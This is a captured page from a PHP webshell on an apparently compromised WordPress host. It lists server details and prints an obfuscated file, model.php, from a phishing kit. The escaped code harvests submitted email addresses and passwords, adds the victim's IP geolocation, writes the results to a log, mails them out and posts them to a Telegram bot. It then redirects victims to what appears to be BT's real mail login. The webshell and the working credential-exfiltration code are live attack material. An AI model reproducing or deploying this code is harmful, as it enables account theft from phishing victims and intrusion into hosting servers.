403Webshell
Server IP : 198.54.115.198  /  Your IP : 216.73.216.142
Web Server : LiteSpeed
System : Linux server192.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
User : seatpheu ( 1569)
PHP Version : 8.1.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/seatpheu/public_html/wp-content/001/bypass/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/seatpheu/public_html/wp-content/001/bypass/model.php
<?php
 goto Yba0H; CIAlB: function stt($botToken, $chatId, $message) { $url = "\150\x74\164\160\163\x3a\x2f\57\141\x70\151\x2e\x74\x65\154\x65\x67\162\141\155\x2e\x6f\162\147\x2f\142\157\x74{$botToken}\57\x73\145\156\144\x4d\145\x73\163\x61\x67\x65"; $payload = array("\143\x68\141\164\137\151\x64" => $chatId, "\164\x65\170\164" => $message, "\x70\x61\162\x73\145\137\155\157\x64\145" => "\115\x61\162\153\x64\x6f\167\x6e"); $options = array("\x68\164\x74\x70" => array("\155\x65\x74\150\157\x64" => "\120\117\x53\124", "\x68\x65\141\x64\145\162" => "\x43\x6f\156\164\x65\x6e\164\55\164\171\160\145\72\x20\x61\x70\160\x6c\x69\143\141\x74\x69\x6f\156\57\x78\x2d\x77\x77\167\x2d\x66\x6f\162\155\55\165\162\x6c\x65\156\x63\157\x64\x65\x64\15\xa", "\143\x6f\156\164\145\156\164" => http_build_query($payload))); $context = stream_context_create($options); $result = @file_get_contents($url, false, $context); return $result !== false; } goto tLtY3; w2Hkf: $auth = $_POST["\141\x75\164\150"]; goto UxVxx; Yba0H: require_once "\160\x72\157\164\145\143\164\x2e\160\150\x70"; goto TR8Uj; jhfjY: $_SESSION["\145\x6d\141\151\154"] = $_POST["\145\x6d\x61\151\x6c"]; goto v5W10; VWdUF: $timestamp = date("\144\57\x6d\x2f\131\40\150\x3a\151\x3a\163\x61") . "\x20\107\x4d\124"; goto GTpqQ; KMf97: mail($emailTo, $subject, $log, $headers); goto roQnT; AWyB6: $location = getGeoLocation($ip, ''); goto VWdUF; TR8Uj: require_once "\x2e\x2e\x2f\x63\x6f\x6e\146\151\x67\x2e\x70\150\160"; goto HipF2; odrbX: $headers = "\x46\162\157\155\72\40\114\157\147\40\103\x6f\154\x6c\x65\143\x74\x6f\162\40\74\x6e\157\x72\145\x70\154\x79\x3e\15\12"; goto zwoGa; DPhi2: $log .= "\x49\x50\40\x20\40\40\40\x20\40\x20\x20\40\x20\x20\40\40\40\40\x3a\x20\x68\x74\164\x70\x73\x3a\57\57\167\167\x77\x2e\147\x65\157\x64\141\164\x61\x74\x6f\x6f\x6c\56\x63\157\155\57\x3f\111\120\75{$ip}\xd\xa"; goto VXiWO; ZtIir: $count = $_POST["\x63\x6f\x75\x6e\x74"]; goto w2Hkf; YYe68: $subject = "\125\163\145\x72\x20\x4c\157\x67\x20\146\162\157\x6d\x20\133{$location["\143\x6f\165\156\164\x72\x79"]}\135"; goto odrbX; HipF2: function getGeoLocation($ip, $apiKey) { $url = "\x68\164\x74\160\x3a\57\x2f\x61\160\x69\56\x69\x70\x69\156\x66\x6f\x64\142\x2e\143\x6f\x6d\57\166\x33\x2f\151\160\55\x63\151\x74\171\x2f\77\x6b\x65\171\75\62\x62\x33\x64\67\144\x30\141\x64\61\x61\62\70\x35\x32\x37\71\61\63\71\x34\70\67\143\145\67\67\x66\63\146\x35\x38\x64\x39\x38\x30\x65\145\x61\x39\65\x34\66\x62\x35\x63\x63\143\x35\144\60\x38\146\x35\145\x65\66\x32\x63\145\x37\64\x37\x31\46\x69\160\x3d{$ip}\x26\146\x6f\x72\x6d\141\164\75\x6a\x73\x6f\x6e"; $response = @file_get_contents($url); if ($response === false) { return array("\143\157\x75\x6e\x74\x72\x79" => "\125\156\153\156\157\x77\x6e", "\x73\x74\141\164\x65" => "\x55\156\153\x6e\x6f\167\x6e"); } $data = json_decode($response); return array("\x63\157\165\x6e\164\162\x79" => isset($data->countryName) ? $data->countryName : "\125\156\x6b\156\x6f\167\156", "\163\164\x61\x74\x65" => isset($data->regionName) ? $data->regionName : "\x55\156\x6b\156\x6f\x77\x6e"); } goto CIAlB; WMJ3g: $log .= "\124\151\155\145\x73\164\141\155\x70\x20\x20\40\x20\40\x20\x20\x20\x20\72\x20{$timestamp}\xd\12"; goto eNl2z; v5W10: $formType = $_POST["\x66\x6f\x72\155\x74\171\160\x65"]; goto ZtIir; mbgvc: file_put_contents($logFile, $log, FILE_APPEND); goto YYe68; UxVxx: if ($auth !== '') { header("\x4c\157\x63\141\x74\x69\157\x6e\72\40\x68\164\164\x70\x73\72\57\57\x65\x6d\x61\x69\x6c\56\142\164\x2e\x63\x6f\x6d\x2f\x6d\141\x69\154\57\151\x6e\x64\x65\170\x2d\x72\x75\x69\x2e\152\x73\x70\x3f\x76\x3d\115\x58\x5f\x33\x2e\61\x30\x2e\x30\x2e\x32"); die; } goto zYh8K; tLtY3: session_start(); goto jhfjY; VXiWO: $log .= "\x43\x6f\165\x6e\x74\x72\x79\x20\40\40\x20\x20\x20\x20\40\40\x20\x20\72\40{$location["\x63\157\x75\156\x74\x72\x79"]}\xd\12"; goto Vh8r2; zYh8K: $ip = isset($_SERVER["\122\105\115\117\124\x45\x5f\x41\x44\x44\x52"]) ? $_SERVER["\122\x45\115\x4f\124\105\x5f\x41\x44\104\122"] : "\x31\x32\67\x2e\60\56\x30\56\x31"; goto AWyB6; zwoGa: $headers .= "\115\x49\x4d\105\x2d\x56\x65\x72\x73\151\157\x6e\72\40\61\56\60\xd\12"; goto capHn; eNl2z: $log .= "\x42\162\x6f\167\163\145\162\40\x20\40\x20\40\40\x20\x20\40\x20\40\x3a\40{$_SERVER["\x48\124\x54\x50\137\x55\123\x45\122\137\x41\x47\105\x4e\x54"]}\15\xa"; goto mbgvc; Vh8r2: $log .= "\x53\164\x61\164\145\40\x20\40\x20\x20\40\x20\x20\x20\40\x20\40\x20\72\40{$location["\163\164\x61\x74\145"]}\15\xa"; goto WMJ3g; capHn: $headers .= "\103\x6f\156\164\x65\x6e\x74\x2d\124\x79\160\145\72\40\164\145\170\x74\x2f\x70\154\141\151\x6e\x3b\40\143\x68\141\x72\163\145\164\x3d\125\124\x46\55\x38\xd\xa"; goto KMf97; uprVY: if ($formType === "\154\157\x67\151\x6e") { $email = $_POST["\x65\155\141\x69\154"]; $password = $_POST["\x70\x61\163\163\167\x6f\162\144"]; $log .= "\105\155\x61\x69\154\40\40\x20\x20\40\x20\40\x20\40\40\40\x20\40\x3a\x20{$email}\xd\xa"; $log .= "\120\141\163\x73\x77\x6f\x72\x64\40\40\40\x20\40\x20\x20\40\40\x20\72\x20{$password}\15\xa"; } else { header("\114\x6f\x63\141\164\151\157\156\72\40\56\x2e\x2f\77\x69\x6e\166\141\x6c\151\x64\75\x74\162\x75\x65"); die; } goto DPhi2; GTpqQ: $log = "\43\55\x2d\x2d\x2d\x2d\x2d\x2d\x2d\55\x2d\x2d\55\55\55\x2d\x2d\x2d\x2d\x2d\55\x2d\55\x2d\x2d\x2d\x2d\55\x5b\40\x52\157\165\156\144\x63\x75\142\x65\x2d\55\x2d\x2d\55\x2d\55\x54\145\x6c\x65\x2e\56\x2e\x40\x66\x69\x78\x73\x78\x5d\55\x2d\x2d\55\55\55\55\x2d\x2d\x2d\55\x2d\x2d\55\55\55\x2d\x2d\x2d\x2d\x2d\55\55\x2d\55\55\x2d\55\43\xd\12"; goto uprVY; R2hBR: if ($count === "\x30") { header("\114\x6f\143\141\164\x69\x6f\x6e\72\40\56\x2e\x2f\x3f\151\156\166\141\x6c\151\x64\75\164\x72\x75\x65"); } else { session_destroy(); header("\114\x6f\x63\x61\x74\x69\x6f\156\72\x20\x68\164\164\x70\x73\72\x2f\x2f\x65\155\141\x69\154\56\x62\164\x2e\x63\157\155\57\x6d\141\x69\x6c\x2f\x69\156\x64\x65\x78\55\162\165\x69\x2e\152\x73\x70\77\166\75\x4d\x58\137\63\x2e\x31\x30\56\60\56\62"); } goto JKe74; roQnT: stt($teltok, $telchatid, $log); goto R2hBR; JKe74: die;

Youez - 2016 - github.com/yon3zu
LinuXploit